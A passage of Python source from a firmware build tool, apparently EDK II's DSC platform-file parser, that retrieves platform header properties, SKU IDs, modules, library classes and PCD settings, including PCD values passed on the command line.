if self._PlatformName is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No PLATFORM_NAME", File=self.MetaFile)
return self._PlatformName
@property
def Platform(self):
return self.PlatformName
## Retrieve file guid
@property
def Guid(self):
if self._Guid is None:
if self._Header is None:
self._GetHeaderInfo()
if self._Guid is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No PLATFORM_GUID", File=self.MetaFile)
return self._Guid
## Retrieve platform version
@property
def Version(self):
if self._Version is None:
if self._Header is None:
self._GetHeaderInfo()
if self._Version is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No PLATFORM_VERSION", File=self.MetaFile)
return self._Version
## Retrieve platform description file version
@property
def DscSpecification(self):
if self._DscSpecification is None:
if self._Header is None:
self._GetHeaderInfo()
if self._DscSpecification is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No DSC_SPECIFICATION", File=self.MetaFile)
return self._DscSpecification
## Retrieve OUTPUT_DIRECTORY
@property
def OutputDirectory(self):
if self._OutputDirectory is None:
if self._Header is None:
self._GetHeaderInfo()
if self._OutputDirectory is None:
self._OutputDirectory = os.path.join("Build", self._PlatformName)
return self._OutputDirectory
## Retrieve SUPPORTED_ARCHITECTURES
@property
def SupArchList(self):
if self._SupArchList is None:
if self._Header is None:
self._GetHeaderInfo()
if self._SupArchList is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No SUPPORTED_ARCHITECTURES", File=self.MetaFile)
return self._SupArchList
## Retrieve BUILD_TARGETS
@property
def BuildTargets(self):
if self._BuildTargets is None:
if self._Header is None:
self._GetHeaderInfo()
if self._BuildTargets is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No BUILD_TARGETS", File=self.MetaFile)
return self._BuildTargets
@property
def PcdInfoFlag(self):
if self._PcdInfoFlag is None or self._PcdInfoFlag.upper() == 'FALSE':
return False
elif self._PcdInfoFlag.upper() == 'TRUE':
return True
else:
return False
@property
def VarCheckFlag(self):
if self._VarCheckFlag is None or self._VarCheckFlag.upper() == 'FALSE':
return False
elif self._VarCheckFlag.upper() == 'TRUE':
return True
else:
return False
# # Retrieve SKUID_IDENTIFIER
@property
def SkuName(self):
if self._SkuName is None:
if self._Header is None:
self._GetHeaderInfo()
if self._SkuName is None:
self._SkuName = TAB_DEFAULT
return self._SkuName
## Override SKUID_IDENTIFIER
@SkuName.setter
def SkuName(self, Value):
self._SkuName = Value
@property
def FlashDefinition(self):
if self._FlashDefinition is None:
if self._Header is None:
self._GetHeaderInfo()
if self._FlashDefinition is None:
self._FlashDefinition = ''
return self._FlashDefinition
@property
def Prebuild(self):
if self._Prebuild is None:
if self._Header is None:
self._GetHeaderInfo()
if self._Prebuild is None:
self._Prebuild = ''
return self._Prebuild
@property
def Postbuild(self):
if self._Postbuild is None:
if self._Header is None:
self._GetHeaderInfo()
if self._Postbuild is None:
self._Postbuild = ''
return self._Postbuild
## Retrieve FLASH_DEFINITION
@property
def BuildNumber(self):
if self._BuildNumber is None:
if self._Header is None:
self._GetHeaderInfo()
if self._BuildNumber is None:
self._BuildNumber = ''
return self._BuildNumber
## Retrieve MAKEFILE_NAME
@property
def MakefileName(self):
if self._MakefileName is None:
if self._Header is None:
self._GetHeaderInfo()
if self._MakefileName is None:
self._MakefileName = ''
return self._MakefileName
## Retrieve BsBaseAddress
@property
def BsBaseAddress(self):
if self._BsBaseAddress is None:
if self._Header is None:
self._GetHeaderInfo()
if self._BsBaseAddress is None:
self._BsBaseAddress = ''
return self._BsBaseAddress
## Retrieve RtBaseAddress
@property
def RtBaseAddress(self):
if self._RtBaseAddress is None:
if self._Header is None:
self._GetHeaderInfo()
if self._RtBaseAddress is None:
self._RtBaseAddress = ''
return self._RtBaseAddress
## Retrieve the top address for the load fix address
@property
def LoadFixAddress(self):
if self._LoadFixAddress is None:
if self._Header is None:
self._GetHeaderInfo()
if self._LoadFixAddress is None:
self._LoadFixAddress = self._Macros.get(TAB_FIX_LOAD_TOP_MEMORY_ADDRESS, '0')
try:
self._LoadFixAddress = int (self._LoadFixAddress, 0)
except:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS %s is not valid dec or hex string" % (self._LoadFixAddress))
#
# If command line defined, should override the value in DSC file.
#
if 'FIX_LOAD_TOP_MEMORY_ADDRESS' in GlobalData.gCommandLineDefines:
try:
self._LoadFixAddress = int(GlobalData.gCommandLineDefines['FIX_LOAD_TOP_MEMORY_ADDRESS'], 0)
except:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS %s is not valid dec or hex string" % (GlobalData.gCommandLineDefines['FIX_LOAD_TOP_MEMORY_ADDRESS']))
if self._LoadFixAddress < 0:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is set to the invalid negative value 0x%x" % (self._LoadFixAddress))
if self._LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self._LoadFixAddress % 0x1000 != 0:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is set to the invalid unaligned 4K value 0x%x" % (self._LoadFixAddress))
return self._LoadFixAddress
## Retrieve RFCLanguage filter
@property
def RFCLanguages(self):
if self._RFCLanguages is None:
if self._Header is None:
self._GetHeaderInfo()
if self._RFCLanguages is None:
self._RFCLanguages = []
return self._RFCLanguages
## Retrieve ISOLanguage filter
@property
def ISOLanguages(self):
if self._ISOLanguages is None:
if self._Header is None:
self._GetHeaderInfo()
if self._ISOLanguages is None:
self._ISOLanguages = []
return self._ISOLanguages
## Retrieve the GUID string for VPD tool
@property
def VpdToolGuid(self):
if self._VpdToolGuid is None:
if self._Header is None:
self._GetHeaderInfo()
if self._VpdToolGuid is None:
self._VpdToolGuid = ''
return self._VpdToolGuid
## Retrieve [SkuIds] section information
@property
def SkuIds(self):
if self._SkuIds is None:
self._SkuIds = OrderedDict()
RecordList = self._RawData[MODEL_EFI_SKU_ID, self._Arch]
for Record in RecordList:
if not Record[0]:
EdkLogger.error('build', FORMAT_INVALID, 'No Sku ID number',
File=self.MetaFile, Line=Record[-1])
if not Record[1]:
EdkLogger.error('build', FORMAT_INVALID, 'No Sku ID name',
File=self.MetaFile, Line=Record[-1])
if not Pattern.match(Record[0]) and not HexPattern.match(Record[0]):
EdkLogger.error('build', FORMAT_INVALID, "The format of the Sku ID number is invalid. It only support Integer and HexNumber",
File=self.MetaFile, Line=Record[-1])
if not SkuIdPattern.match(Record[1]) or (Record[2] and not SkuIdPattern.match(Record[2])):
EdkLogger.error('build', FORMAT_INVALID, "The format of the Sku ID name is invalid. The correct format is '(a-zA-Z_)(a-zA-Z0-9_)*'",
File=self.MetaFile, Line=Record[-1])
self._SkuIds[Record[1].upper()] = (str(DscBuildData.ToInt(Record[0])), Record[1].upper(), Record[2].upper())
if TAB_DEFAULT not in self._SkuIds:
self._SkuIds[TAB_DEFAULT] = ("0", TAB_DEFAULT, TAB_DEFAULT)
if TAB_COMMON not in self._SkuIds:
self._SkuIds[TAB_COMMON] = ("0", TAB_DEFAULT, TAB_DEFAULT)
return self._SkuIds
@staticmethod
def ToInt(intstr):
return int(intstr, 16) if intstr.upper().startswith("0X") else int(intstr)
def _GetDefaultStores(self):
if self.DefaultStores is None:
self.DefaultStores = OrderedDict()
RecordList = self._RawData[MODEL_EFI_DEFAULT_STORES, self._Arch]
for Record in RecordList:
if not Record[0]:
EdkLogger.error('build', FORMAT_INVALID, 'No DefaultStores ID number',
File=self.MetaFile, Line=Record[-1])
if not Record[1]:
EdkLogger.error('build', FORMAT_INVALID, 'No DefaultStores ID name',
File=self.MetaFile, Line=Record[-1])
if not Pattern.match(Record[0]) and not HexPattern.match(Record[0]):
EdkLogger.error('build', FORMAT_INVALID, "The format of the DefaultStores ID number is invalid. It only support Integer and HexNumber",
File=self.MetaFile, Line=Record[-1])
if not IsValidWord(Record[1]):
EdkLogger.error('build', FORMAT_INVALID, "The format of the DefaultStores ID name is invalid. The correct format is '(a-zA-Z0-9_)(a-zA-Z0-9_-.)*'",
File=self.MetaFile, Line=Record[-1])
self.DefaultStores[Record[1].upper()] = (DscBuildData.ToInt(Record[0]), Record[1].upper())
if TAB_DEFAULT_STORES_DEFAULT not in self.DefaultStores:
self.DefaultStores[TAB_DEFAULT_STORES_DEFAULT] = (0, TAB_DEFAULT_STORES_DEFAULT)
GlobalData.gDefaultStores = sorted(self.DefaultStores.keys())
return self.DefaultStores
def OverrideDuplicateModule(self):
RecordList = self._RawData[MODEL_META_DATA_COMPONENT, self._Arch]
Macros = self._Macros
Components = {}
for Record in RecordList:
ModuleId = Record[6]
file_guid = self._RawData[MODEL_META_DATA_HEADER, self._Arch, None, ModuleId]
file_guid_str = file_guid[0][2] if file_guid else "NULL"
ModuleFile = PathClass(NormPath(Record[0], Macros), GlobalData.gWorkspace, Arch=self._Arch)
if self._Arch != TAB_ARCH_COMMON and (file_guid_str,str(ModuleFile)) in Components:
self._RawData.DisableOverrideComponent(Components[(file_guid_str,str(ModuleFile))])
Components[(file_guid_str,str(ModuleFile))] = ModuleId
self._RawData._PostProcessed = False
## Retrieve packages this Platform depends on
@cached_property
def Packages(self):
RetVal = set()
RecordList = self._RawData[MODEL_META_DATA_PACKAGE, self._Arch]
Macros = self._Macros
for Record in RecordList:
File = PathClass(NormPath(Record[0], Macros), GlobalData.gWorkspace, Arch=self._Arch)
# check the file validation
ErrorCode, ErrorInfo = File.Validate('.dec')
if ErrorCode != 0:
LineNo = Record[-1]
EdkLogger.error('build', ErrorCode, ExtraData=ErrorInfo, File=self.MetaFile, Line=LineNo)
# parse this package now. we need it to get protocol/ppi/guid value
RetVal.add(self._Bdb[File, self._Arch, self._Target, self._Toolchain])
return RetVal
## Retrieve [Components] section information
@property
def Modules(self):
if self._Modules is not None:
return self._Modules
self.OverrideDuplicateModule()
self._Modules = OrderedDict()
RecordList = self._RawData[MODEL_META_DATA_COMPONENT, self._Arch]
Macros = self._Macros
for Record in RecordList:
ModuleFile = PathClass(NormPath(Record[0], Macros), GlobalData.gWorkspace, Arch=self._Arch)
ModuleId = Record[6]
LineNo = Record[7]
# check the file validation
ErrorCode, ErrorInfo = ModuleFile.Validate('.inf')
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, File=self.MetaFile, Line=LineNo,
ExtraData=ErrorInfo)
Module = ModuleBuildClassObject()
Module.MetaFile = ModuleFile
# get module private library instance
RecordList = self._RawData[MODEL_EFI_LIBRARY_CLASS, self._Arch, None, ModuleId]
for Record in RecordList:
LibraryClass = Record[0]
LibraryPath = PathClass(NormPath(Record[1], Macros), GlobalData.gWorkspace, Arch=self._Arch)
LineNo = Record[-1]
# check the file validation
ErrorCode, ErrorInfo = LibraryPath.Validate('.inf')
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, File=self.MetaFile, Line=LineNo,
ExtraData=ErrorInfo)
if LibraryClass == '' or LibraryClass == 'NULL':
self._NullLibraryNumber += 1
LibraryClass = 'NULL%d' % self._NullLibraryNumber
EdkLogger.verbose("Found forced library for %s\n\t%s [%s]" % (ModuleFile, LibraryPath, LibraryClass))
Module.LibraryClasses[LibraryClass] = LibraryPath
if LibraryPath not in self.LibraryInstances:
self.LibraryInstances.append(LibraryPath)
# get module private PCD setting
for Type in [MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, \
MODEL_PCD_FEATURE_FLAG, MODEL_PCD_DYNAMIC, MODEL_PCD_DYNAMIC_EX]:
RecordList = self._RawData[Type, self._Arch, None, ModuleId]
for TokenSpaceGuid, PcdCName, Setting, Dummy1, Dummy2, Dummy3, Dummy4, Dummy5 in RecordList:
TokenList = GetSplitValueList(Setting)
DefaultValue = TokenList[0]
# the format is PcdName| Value | VOID* | MaxDatumSize
if len(TokenList) > 2:
MaxDatumSize = TokenList[2]
else:
MaxDatumSize = ''
TypeString = self._PCD_TYPE_STRING_[Type]
Pcd = PcdClassObject(
PcdCName,
TokenSpaceGuid,
TypeString,
'',
DefaultValue,
'',
MaxDatumSize,
{},
False,
None
)
Module.Pcds[PcdCName, TokenSpaceGuid] = Pcd
# get module private build options
RecordList = self._RawData[MODEL_META_DATA_BUILD_OPTION, self._Arch, None, ModuleId]
for ToolChainFamily, ToolChain, Option, Dummy1, Dummy2, Dummy3, Dummy4, Dummy5 in RecordList:
if (ToolChainFamily, ToolChain) not in Module.BuildOptions:
Module.BuildOptions[ToolChainFamily, ToolChain] = Option
else:
OptionString = Module.BuildOptions[ToolChainFamily, ToolChain]
Module.BuildOptions[ToolChainFamily, ToolChain] = OptionString + " " + Option
RecordList = self._RawData[MODEL_META_DATA_HEADER, self._Arch, None, ModuleId]
if RecordList:
if len(RecordList) != 1:
EdkLogger.error('build', OPTION_UNKNOWN, 'Only FILE_GUID can be listed in <Defines> section.',
File=self.MetaFile, ExtraData=str(ModuleFile), Line=LineNo)
ModuleFile = ProcessDuplicatedInf(ModuleFile, RecordList[0][2], GlobalData.gWorkspace)
ModuleFile.Arch = self._Arch
self._Modules[ModuleFile] = Module
return self._Modules
## Retrieve all possible library instances used in this platform
@property
def LibraryInstances(self):
if self._LibraryInstances is None:
self.LibraryClasses
return self._LibraryInstances
## Retrieve [LibraryClasses] information
@property
def LibraryClasses(self):
if self._LibraryClasses is None:
self._LibraryInstances = []
#
# tdict is a special dict kind of type, used for selecting correct
# library instance for given library class and module type
#
LibraryClassDict = tdict(True, 3)
# track all library class names
LibraryClassSet = set()
RecordList = self._RawData[MODEL_EFI_LIBRARY_CLASS, self._Arch, None, -1]
Macros = self._Macros
for Record in RecordList:
LibraryClass, LibraryInstance, Dummy, Arch, ModuleType, Dummy, Dummy, LineNo = Record
if LibraryClass == '' or LibraryClass == 'NULL':
self._NullLibraryNumber += 1
LibraryClass = 'NULL%d' % self._NullLibraryNumber
EdkLogger.verbose("Found forced library for arch=%s\n\t%s [%s]" % (Arch, LibraryInstance, LibraryClass))
LibraryClassSet.add(LibraryClass)
LibraryInstance = PathClass(NormPath(LibraryInstance, Macros), GlobalData.gWorkspace, Arch=self._Arch)
# check the file validation
ErrorCode, ErrorInfo = LibraryInstance.Validate('.inf')
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, File=self.MetaFile, Line=LineNo,
ExtraData=ErrorInfo)
if ModuleType != TAB_COMMON and ModuleType not in SUP_MODULE_LIST:
EdkLogger.error('build', OPTION_UNKNOWN, "Unknown module type [%s]" % ModuleType,
File=self.MetaFile, ExtraData=LibraryInstance, Line=LineNo)
LibraryClassDict[Arch, ModuleType, LibraryClass] = LibraryInstance
if LibraryInstance not in self._LibraryInstances:
self._LibraryInstances.append(LibraryInstance)
# resolve the specific library instance for each class and each module type
self._LibraryClasses = tdict(True)
for LibraryClass in LibraryClassSet:
# try all possible module types
for ModuleType in SUP_MODULE_LIST:
LibraryInstance = LibraryClassDict[self._Arch, ModuleType, LibraryClass]
if LibraryInstance is None:
continue
self._LibraryClasses[LibraryClass, ModuleType] = LibraryInstance
RecordList = self._RawData[MODEL_EFI_LIBRARY_INSTANCE, self._Arch]
for Record in RecordList:
File = PathClass(NormPath(Record[0], Macros), GlobalData.gWorkspace, Arch=self._Arch)
LineNo = Record[-1]
# check the file validation
ErrorCode, ErrorInfo = File.Validate('.inf')
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, File=self.MetaFile, Line=LineNo,
ExtraData=ErrorInfo)
if File not in self._LibraryInstances:
self._LibraryInstances.append(File)
#
# we need the module name as the library class name, so we have
# to parse it here. (self._Bdb[] will trigger a file parse if it
# hasn't been parsed)
#
Library = self._Bdb[File, self._Arch, self._Target, self._Toolchain]
self._LibraryClasses[Library.BaseName, ':dummy:'] = Library
return self._LibraryClasses
def _ValidatePcd(self, PcdCName, TokenSpaceGuid, Setting, PcdType, LineNo):
if not self._DecPcds:
FdfInfList = []
if GlobalData.gFdfParser:
FdfInfList = GlobalData.gFdfParser.Profile.InfList
PkgSet = set()
for Inf in FdfInfList:
ModuleFile = PathClass(NormPath(Inf), GlobalData.gWorkspace, Arch=self._Arch)
if ModuleFile in self._Modules:
continue
ModuleData = self._Bdb[ModuleFile, self._Arch, self._Target, self._Toolchain]
PkgSet.update(ModuleData.Packages)
if self.Packages:
PkgSet.update(self.Packages)
self._DecPcds, self._GuidDict = GetDeclaredPcd(self, self._Bdb, self._Arch, self._Target, self._Toolchain, PkgSet)
self._GuidDict.update(GlobalData.gPlatformPcds)
if (PcdCName, TokenSpaceGuid) not in self._DecPcds:
EdkLogger.error('build', PARSER_ERROR,
"Pcd (%s.%s) defined in DSC is not declared in DEC files referenced in INF files in FDF. Arch: ['%s']" % (TokenSpaceGuid, PcdCName, self._Arch),
File=self.MetaFile, Line=LineNo)
ValueList, IsValid, Index = AnalyzeDscPcd(Setting, PcdType, self._DecPcds[PcdCName, TokenSpaceGuid].DatumType)
if not IsValid:
if PcdType not in [MODEL_PCD_FEATURE_FLAG, MODEL_PCD_FIXED_AT_BUILD]:
EdkLogger.error('build', FORMAT_INVALID, "Pcd format incorrect.", File=self.MetaFile, Line=LineNo,
ExtraData="%s.%s|%s" % (TokenSpaceGuid, PcdCName, Setting))
else:
if ValueList[2] == '-1':
EdkLogger.error('build', FORMAT_INVALID, "Pcd format incorrect.", File=self.MetaFile, Line=LineNo,
ExtraData="%s.%s|%s" % (TokenSpaceGuid, PcdCName, Setting))
if ValueList[Index]:
DatumType = self._DecPcds[PcdCName, TokenSpaceGuid].DatumType
if "{CODE(" not in ValueList[Index]:
try:
ValueList[Index] = ValueExpressionEx(ValueList[Index], DatumType, self._GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, Value, File=self.MetaFile, Line=LineNo,
ExtraData="PCD [%s.%s] Value \"%s\" " % (
TokenSpaceGuid, PcdCName, ValueList[Index]))
except EvaluationException as Excpt:
if hasattr(Excpt, 'Pcd'):
if Excpt.Pcd in GlobalData.gPlatformOtherPcds:
EdkLogger.error('Parser', FORMAT_INVALID, "Cannot use this PCD (%s) in an expression as"
" it must be defined in a [PcdsFixedAtBuild] or [PcdsFeatureFlag] section"
" of the DSC file" % Excpt.Pcd,
File=self.MetaFile, Line=LineNo)
else:
EdkLogger.error('Parser', FORMAT_INVALID, "PCD (%s) is not defined in DSC file" % Excpt.Pcd,
File=self.MetaFile, Line=LineNo)
else:
EdkLogger.error('Parser', FORMAT_INVALID, "Invalid expression: %s" % str(Excpt),
File=self.MetaFile, Line=LineNo)
if ValueList[Index]:
Valid, ErrStr = CheckPcdDatum(self._DecPcds[PcdCName, TokenSpaceGuid].DatumType, ValueList[Index])
if not Valid:
EdkLogger.error('build', FORMAT_INVALID, ErrStr, File=self.MetaFile, Line=LineNo,
ExtraData="%s.%s" % (TokenSpaceGuid, PcdCName))
if PcdType in (MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT, MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE):
if self._DecPcds[PcdCName, TokenSpaceGuid].DatumType.strip() != ValueList[1].strip():
DecPcd = self._DecPcds[PcdCName, TokenSpaceGuid]
EdkLogger.error('build', FORMAT_INVALID,
"Pcd datumtype used in DSC file is not the same as its declaration. DatumType:%s"%DecPcd.DatumType,
File=self.MetaFile, Line=LineNo,
ExtraData="Dsc:%s.%s|%s\n Dec:%s.%s|%s|%s|%s" % (TokenSpaceGuid, PcdCName, Setting, TokenSpaceGuid, \
PcdCName, DecPcd.DefaultValue, DecPcd.DatumType, DecPcd.TokenValue))
if (TokenSpaceGuid + '.' + PcdCName) in GlobalData.gPlatformPcds:
if GlobalData.gPlatformPcds[TokenSpaceGuid + '.' + PcdCName] != ValueList[Index]:
GlobalData.gPlatformPcds[TokenSpaceGuid + '.' + PcdCName] = ValueList[Index]
return ValueList
def _FilterPcdBySkuUsage(self, Pcds):
available_sku = self.SkuIdMgr.AvailableSkuIdSet
sku_usage = self.SkuIdMgr.SkuUsageType
if sku_usage == SkuClass.SINGLE:
for pcdname in Pcds:
pcd = Pcds[pcdname]
Pcds[pcdname].SkuInfoList = {TAB_DEFAULT:pcd.SkuInfoList[skuid] for skuid in pcd.SkuInfoList if skuid in available_sku}
if isinstance(pcd, StructurePcd) and pcd.SkuOverrideValues:
Pcds[pcdname].SkuOverrideValues = {TAB_DEFAULT:pcd.SkuOverrideValues[skuid] for skuid in pcd.SkuOverrideValues if skuid in available_sku}
else:
for pcdname in Pcds:
pcd = Pcds[pcdname]
Pcds[pcdname].SkuInfoList = {skuid:pcd.SkuInfoList[skuid] for skuid in pcd.SkuInfoList if skuid in available_sku}
if isinstance(pcd, StructurePcd) and pcd.SkuOverrideValues:
Pcds[pcdname].SkuOverrideValues = {skuid:pcd.SkuOverrideValues[skuid] for skuid in pcd.SkuOverrideValues if skuid in available_sku}
return Pcds
def CompleteHiiPcdsDefaultStores(self, Pcds):
HiiPcd = [Pcds[pcd] for pcd in Pcds if Pcds[pcd].Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]]
DefaultStoreMgr = DefaultStore(self.DefaultStores)
for pcd in HiiPcd:
for skuid in pcd.SkuInfoList:
skuobj = pcd.SkuInfoList.get(skuid)
if TAB_DEFAULT_STORES_DEFAULT not in skuobj.DefaultStoreDict:
PcdDefaultStoreSet = set(defaultstorename for defaultstorename in skuobj.DefaultStoreDict)
mindefaultstorename = DefaultStoreMgr.GetMin(PcdDefaultStoreSet)
skuobj.DefaultStoreDict[TAB_DEFAULT_STORES_DEFAULT] = skuobj.DefaultStoreDict[mindefaultstorename]
return Pcds
def RecoverCommandLinePcd(self):
def UpdateCommandLineValue(pcd):
if pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
pcd.PcdValueFromComm = pcd.DefaultValue
elif pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
pcd.PcdValueFromComm = pcd.SkuInfoList.get(TAB_DEFAULT).HiiDefaultValue
else:
pcd.PcdValueFromComm = pcd.SkuInfoList.get(TAB_DEFAULT).DefaultValue
for pcd in self._Pcds:
if isinstance(self._Pcds[pcd], StructurePcd) and (self._Pcds[pcd].PcdValueFromComm or self._Pcds[pcd].PcdFieldValueFromComm):
UpdateCommandLineValue(self._Pcds[pcd])
def __ParsePcdFromCommandLine(self):
if GlobalData.BuildOptionPcd:
for i, pcd in enumerate(GlobalData.BuildOptionPcd):
if isinstance(pcd, tuple):
continue
(pcdname, pcdvalue) = pcd.split('=')
if not pcdvalue:
EdkLogger.error('build', AUTOGEN_ERROR, "No Value specified for the PCD %s." % (pcdname))
if '.' in pcdname:
(Name1, Name2) = pcdname.split('.', 1)
if "." in Name2:
(Name3, FieldName) = Name2.split(".", 1)
if ((Name3, Name1)) in self.DecPcds:
HasTokenSpace = True
TokenCName = Name3
TokenSpaceGuidCName = Name1
else:
FieldName = Name2
TokenCName = Name1
TokenSpaceGuidCName = ''
HasTokenSpace = False
else:
if ((Name2, Name1)) in self.DecPcds:
HasTokenSpace = True
TokenCName = Name2
TokenSpaceGuidCName = Name1
FieldName =""
else:
FieldName = Name2
TokenCName = Name1
TokenSpaceGuidCName = ''
HasTokenSpace = False
else:
FieldName = ""
TokenCName = pcdname
TokenSpaceGuidCName = ''
HasTokenSpace = False
TokenSpaceGuidCNameList = []
FoundFlag = False
PcdDatumType = ''
DisplayName = TokenCName
if FieldName:
DisplayName = TokenCName + '.' + FieldName
if not HasTokenSpace:
for key in self.DecPcds:
PcdItem = self.DecPcds[key]
if TokenCName == PcdItem.TokenCName:
if not PcdItem.TokenSpaceGuidCName in TokenSpaceGuidCNameList:
if len (TokenSpaceGuidCNameList) < 1:
TokenSpaceGuidCNameList.append(PcdItem.TokenSpaceGuidCName)
TokenSpaceGuidCName = PcdItem.TokenSpaceGuidCName
PcdDatumType = PcdItem.DatumType
FoundFlag = True
else:
EdkLogger.error(
'build',
AUTOGEN_ERROR,
"The Pcd %s is found under multiple different TokenSpaceGuid: %s and %s." % (DisplayName, PcdItem.TokenSpaceGuidCName, TokenSpaceGuidCNameList[0])
)
else:
if (TokenCName, TokenSpaceGuidCName) in self.DecPcds:
PcdDatumType = self.DecPcds[(TokenCName, TokenSpaceGuidCName)].DatumType
FoundFlag = True
if not FoundFlag:
if HasTokenSpace:
EdkLogger.error('build', AUTOGEN_ERROR, "The Pcd %s.%s is not found in the DEC file." % (TokenSpaceGuidCName, DisplayName))
else:
EdkLogger.error('build', AUTOGEN_ERROR, "The Pcd %s is not found in the DEC file." % (DisplayName))
pcdvalue = pcdvalue.replace("\\\\\\'", '\\\\\\"').replace('\\\'', '\'').replace('\\\\\\"', "\\'")
if FieldName:
pcdvalue = DscBuildData.HandleFlexiblePcd(TokenSpaceGuidCName, TokenCName, pcdvalue, PcdDatumType, self._GuidDict, FieldName)
else:
pcdvalue = DscBuildData.HandleFlexiblePcd(TokenSpaceGuidCName, TokenCName, pcdvalue, PcdDatumType, self._GuidDict)
IsValid, Cause = CheckPcdDatum(PcdDatumType, pcdvalue)
if not IsValid:
EdkLogger.error("build", FORMAT_INVALID, Cause, ExtraData="%s.%s" % (TokenSpaceGuidCName, TokenCName))
GlobalData.BuildOptionPcd[i] = (TokenSpaceGuidCName, TokenCName, FieldName, pcdvalue, ("build command options", 1))
if GlobalData.BuildOptionPcd:
inf_objs = [item for item in self._Bdb._CACHE_.values() if item.Arch == self.Arch and item.MetaFile.Ext.lower() == '.inf']
for pcd in GlobalData.BuildOptionPcd:
(TokenSpaceGuidCName, TokenCName, FieldName, pcdvalue, _) = pcd
for BuildData in inf_objs:
for key in BuildData.Pcds:
PcdItem = BuildData.Pcds[key]
if (TokenSpaceGuidCName, TokenCName) == (PcdItem.TokenSpaceGuidCName, PcdItem.TokenCName) and FieldName =="":
PcdItem.DefaultValue = pcdvalue
PcdItem.PcdValueFromComm = pcdvalue
#In command line, the latter full assign value in commandLine should override the former field assign value.
#For example, --pcd Token.pcd.field="" --pcd Token.pcd=H"{}"
delete_assign = []
field_assign = {}
if GlobalData.BuildOptionPcd:
for pcdTuple in GlobalData.BuildOptionPcd:
TokenSpaceGuid, Token, Field = pcdTuple[0], pcdTuple[1], pcdTuple[2]
if Field:
if (TokenSpaceGuid, Token) not in field_assign:
field_assign[TokenSpaceGuid, Token] = []
field_assign[TokenSpaceGuid, Token].append(pcdTuple)
else:
if (TokenSpaceGuid, Token) in field_assign:
delete_assign.extend(field_assign[TokenSpaceGuid, Token])
field_assign[TokenSpaceGuid, Token] = []
for item in delete_assign:
GlobalData.BuildOptionPcd.remove(item)
@staticmethod
def HandleFlexiblePcd(TokenSpaceGuidCName, TokenCName, PcdValue, PcdDatumType, GuidDict, FieldName=''):
if FieldName:
IsArray = False
TokenCName += '.' + FieldName
if PcdValue.startswith('H'):
if FieldName and _IsFieldValueAnArray(PcdValue[1:]):
PcdDatumType = TAB_VOID
IsArray = True
if FieldName and not IsArray:
return PcdValue
try:
PcdValue = ValueExpressionEx(PcdValue[1:], PcdDatumType, GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, 'PCD [%s.%s] Value "%s", %s' %
(TokenSpaceGuidCName, TokenCName, PcdValue, Value))
elif PcdValue.startswith("L'") or PcdValue.startswith("'"):
if FieldName and _IsFieldValueAnArray(PcdValue):
PcdDatumType = TAB_VOID
IsArray = True
if FieldName and not IsArray:
return PcdValue
try:
PcdValue = ValueExpressionEx(PcdValue, PcdDatumType, GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, 'PCD [%s.%s] Value "%s", %s' %
(TokenSpaceGuidCName, TokenCName, PcdValue, Value))
elif PcdValue.startswith('L'):
PcdValue = 'L"' + PcdValue[1:] + '"'
if FieldName and _IsFieldValueAnArray(PcdValue):
PcdDatumType = TAB_VOID
IsArray = True
if FieldName and not IsArray:
return PcdValue
try:
PcdValue = ValueExpressionEx(PcdValue, PcdDatumType, GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, 'PCD [%s.%s] Value "%s", %s' %
(TokenSpaceGuidCName, TokenCName, PcdValue, Value))
else:
if PcdValue.upper() == 'FALSE':
PcdValue = str(0)
if PcdValue.upper() == 'TRUE':
PcdValue = str(1)
if not FieldName:
if PcdDatumType not in TAB_PCD_NUMERIC_TYPES:
PcdValue = '"' + PcdValue + '"'
elif not PcdValue.isdigit() and not PcdValue.upper().startswith('0X'):
PcdValue = '"' + PcdValue + '"'
else:
IsArray = False
Base = 10
if PcdValue.upper().startswith('0X'):
Base = 16
try:
Num = int(PcdValue, Base)
except:
PcdValue = '"' + PcdValue + '"'
if _IsFieldValueAnArray(PcdValue):
PcdDatumType = TAB_VOID
IsArray = True
if not IsArray:
return PcdValue
try:
PcdValue = ValueExpressionEx(PcdValue, PcdDatumType, GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, 'PCD [%s.%s] Value "%s", %s' %
(TokenSpaceGuidCName, TokenCName, PcdValue, Value))
return PcdValue
## Retrieve all PCD settings in platform
@property
def Pcds(self):
if self._Pcds is None:
self._Pcds = OrderedDict()
self.__ParsePcdFromCommandLine()
self._Pcds.update(self._GetPcd(MODEL_PCD_FIXED_AT_BUILD))
